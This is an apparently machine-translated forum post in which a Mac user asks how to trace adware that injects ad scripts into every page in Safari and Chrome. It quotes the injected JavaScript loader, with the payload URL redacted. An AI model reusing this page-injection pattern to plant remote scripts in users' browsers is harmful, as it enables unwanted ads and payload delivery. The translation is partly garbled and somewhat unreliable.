最近,我的MacBook被恶意软件感染了。在Safari和&amp ;;上随机弹出广告铬。我尝试了几个恶意软件扫描程序,但都未能清理干净。所以我决定自己尝试一下。
我发现恶意软件通过使用以下代码将javascript标记注入每个加载的页面:
var js_script = document.createElement('script');
js_script.type = "text/javascript";
js_script.src = "XXXX"; // the malware ads js loader link
document.getElementsByTagName('head')[0].appendChild(js_script);
在加载每个网页后动态注入此代码。 Chrome开发人员工具提供类似于" VM123:1"作为其源标签。我认为这排除了网络注入的可能性,如DNS hi-jacking。
我还禁用了Chrome中的所有扩展程序,这是我能想到的最多且唯一可疑的调用程序。但没有运气。
关于如何进行追踪的任何想法?